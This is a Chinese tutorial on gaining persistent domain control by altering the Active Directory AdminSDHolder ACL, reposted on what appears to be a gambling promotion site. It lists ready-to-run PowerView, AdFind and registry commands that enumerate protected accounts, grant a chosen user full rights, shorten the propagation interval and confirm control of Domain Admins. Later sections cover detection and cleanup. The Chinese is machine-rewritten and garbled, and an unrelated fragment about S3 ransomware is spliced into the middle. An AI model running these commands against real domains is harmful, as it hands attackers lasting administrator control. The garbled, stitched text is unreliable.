域渗入——AdminSDHolder | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

域渗入——AdminSDHolder

申博_新闻事件 申博 145次浏览 已收录 0个评论

0x00 媒介

AdminSDHolder是一个特别的AD容器,具有一些默许平安权限,用作受庇护的AD账户和组的模板。

Active Directory将采纳AdminSDHolder对象的ACL并按期将其应用于一切受庇护的AD账户和组,以防备不测和无意的修正并确保对这些对象的接见是平安的。

假如能够修正AdminSDHolder对象的ACL,那末修正的权限将自动应用于一切受庇护的AD账户和组,这能够作为一个域环境权限保持的要领。

本将要参考公然材料,连系本身的明白,引见应用要领,补全消灭ACL的要领,剖析检测要领。

0x01 简介

本文将要引见以下内容:

· 应用思绪

· 怎样罗列受庇护的AD账户和组中的信息

· 怎样查询AdminSDHolder对象的ACL

· 怎样向AdminSDHolder对象增加ACL

· 删除AdminSDHolder中指定用户的ACL

· 完整应用要领

· 检测发起

0x02 应用思绪

1.罗列受庇护的AD账户和组中的信息

平常为域内高权限用户,在我的Server2008R2下包括以下组:

· Administrators

· Print Operators

· Backup Operators

· Replicator

· Domain Controllers

· Schema Admins

· Enterprise Admins

· Domain Admins

· Server Operators

· Account Operators

· Read-only Domain Controllers

· Organization Management

· Exchange Trusted Subsystem

2.向AdminSDHolder对象增加ACL

比方,增加用户testa对AdminSDHolder的完整管理权限,默许60分钟今后会自动推送权限设置信息,testa随即取得对一切受庇护帐户和组的完整管理权限。

3.取得对全部域的掌握权限

此时用户testa能够向域管理员组增加帐户,也能够直接接见域掌握器上的文件。

0x03 罗列受庇护的AD账户和组中的信息

关于AdminSDHolder,能够参考的材料:

https://docs.microsoft.com/en-us/previous-versions/technet-magazine/ee361593(v=msdn.10)#id0250006

受庇护的AD账户和组的特性以下:

AdminCount属性为1。

然则,假如对象已移出受庇护组,其AdminCount属性仍为1,也就是说,有能够取得曾是受庇护组的帐户和组。

1.罗列受庇护AD账户的要领

(1)PowerView

下载地点:

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

敕令以下:

Get-NetUser -AdminCount

只筛选出用户名的敕令以下:

Get-NetUser -AdminCount |select samaccountname

(2)Adfind

下载地点:

http://www.joeware.net/freetools/tools/adfind/index.htm

敕令以下:

Adfind.exe -f "&(objectcategory=person)(samaccountname=*)(admincount=1)" -dn

(3)ActiveDirectory模块

Powershell模块,须要装置,域掌握器平常会装置。

敕令以下:

Import-Module ActiveDirectory
Get-ADObject -LDAPFilter “(&(admincount=1)(|(objectcategory=person)(objectcategory=group)))” |select name

注:该敕令会列出受庇护的AD账户和组。

2.罗列受庇护AD组的要领

(1)PowerView

敕令以下:

亚马逊 S3 存储桶勒索软件攻防详解(上)

攻击向量简介 通过我们的云安全研究,我们在犀牛安全实验室(Rhino Security Lab)开发出了一个概念验证的”云勒索软件”,该勒索软件使用 KMS 加密亚马逊 S3存储桶内的 AWS 帐户对象。 攻击者利用这个勒索软件获得对受害者系统的访问控制权限,并对受害者系统上的敏感数据进行加密。 与此同时,攻击者还会威胁受害者,告知受害者,如果受害者不在某一时限内付款,就会删除或公开发布数据。 通常,这些攻击的目标是服务器、工作站和类似的设置,但与许多攻击一样,这

Get-NetGroup -AdminCount

(2)Adfind

敕令以下:

Adfind.exe -f "&(objectcategory=group)(admincount=1)" -dn

(3)ActiveDirectory模块

Powershell模块,须要装置,域掌握器平常会装置。

敕令以下:

Import-Module ActiveDirectory
Get-ADObject -LDAPFilter “(&(admincount=1)(|(objectcategory=person)(objectcategory=group)))” |select name

关于未装置Active Directory模块的体系,能够经由过程以下敕令导入Active Directory模块:

import-module .\Microsoft.ActiveDirectory.Management.dll

Microsoft.ActiveDirectory.Management.dll在装置powershell模块Active Directory后天生,我已提取出来并上传至github:

https://github.com/3gstudent/test/blob/master/Microsoft.ActiveDirectory.Management.dll

注:该敕令会列出受庇护的AD账户和组。

0x04 操纵AdminSDHolder对象的ACL

1.查询AdminSDHolder对象的ACL

运用PowerView,地点以下:

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

注:该版本不支撑Remove-DomainObjectAcl敕令。

查询AdminSDHolder对象的ACL等价于查询”CN=AdminSDHolder,CN=System,DC=test,DC=com”的ACL。

敕令以下:

Import-Module .\PowerView.ps1
Get-ObjectAcl -ADSprefix "CN=AdminSDHolder,CN=System" |select IdentityReference

2.向AdminSDHolder对象增加ACL

运用PowerView,地点以下:

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

增加用户testa的完整接见权限,敕令以下:

Import-Module .\PowerView.ps1
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName testa -Verbose -Rights All

默许守候60分钟今后,testa取得对一切受庇护的AD账户和组的完整接见权限。

3.删除AdminSDHolder中指定用户的ACL

运用PowerView,地点以下:

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

注:该版本支撑Remove-DomainObjectAcl敕令,但不支撑参数TargetADSprefix,所以这里运用TargetSearchBase参数替代。

搜刮前提为”LDAP://CN=AdminSDHolder,CN=System,DC=test,DC=com”

删除用户testa的完整接见权限,敕令以下:

Remove-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=test,DC=com" -PrincipalIdentity testa -Rights All -Verbose

0x05 完整应用思绪

1.罗列受庇护的AD账户和组中的信息

查找有价值的用户,须要确认该用户是不是属于受庇护的AD账户和组,消除曾属于受庇护的AD账户和组。

2.向AdminSDHolder对象增加ACL

比方增加用户testa对AdminSDHolder的完整接见权限。

默许守候60分钟今后,testa取得对一切受庇护的AD账户和组的完整接见权限。

能够经由过程修正注册表的体式格局设置权限推送的间隔时间,注册表位置以下:

· HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters,AdminSDProtectFrequency,REG_DWORD

比方修正成守候600秒的敕令以下:

reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency /t REG_DWORD /d 600

参考材料:

https://blogs.technet.microsoft.com/askds/2009/05/07/five-common-questions-about-adminsdholder-and-sdprop/

注:不发起下落默许间隔时间,由于在大型环境中能够会致使LSASS机能下落。

3.取得对全部域的掌握权限

(1)用户testa能够向域管理员组增加帐户。

考证权限的敕令以下:

Import-Module .\PowerView.ps1
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'testa'}

(2)用户testa能够直接接见域掌握器上的文件。

0x06 检测和消灭

1.检测AdminSDHolder的ACL

检察”CN=AdminSDHolder,CN=System,DC=test,DC=com”的ACL,敕令以下:

Import-Module .\PowerView.ps1
Get-ObjectAcl -ADSprefix "CN=AdminSDHolder,CN=System" |select IdentityReference

注:

这里运用的PowerView版本:

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

检察是不是有可疑用户。

2.消灭AdminSDHolder中可疑用户的ACL

删除AdminSDHolder中可疑用户testa的ACL。

运用PowerView,地点以下:

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

删除用户testa的完整接见权限,敕令以下:

Remove-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=test,DC=com" -PrincipalIdentity testa -Rights All -Verbose

0x07 小结

本文引见了AdminSDHolder作为权限保持的应用要领,补充了检测和消灭AdminSDHolder中可疑用户ACL的要领。

原文地点: https://www.4hou.com/penetration/19634.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明域渗入——AdminSDHolder
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址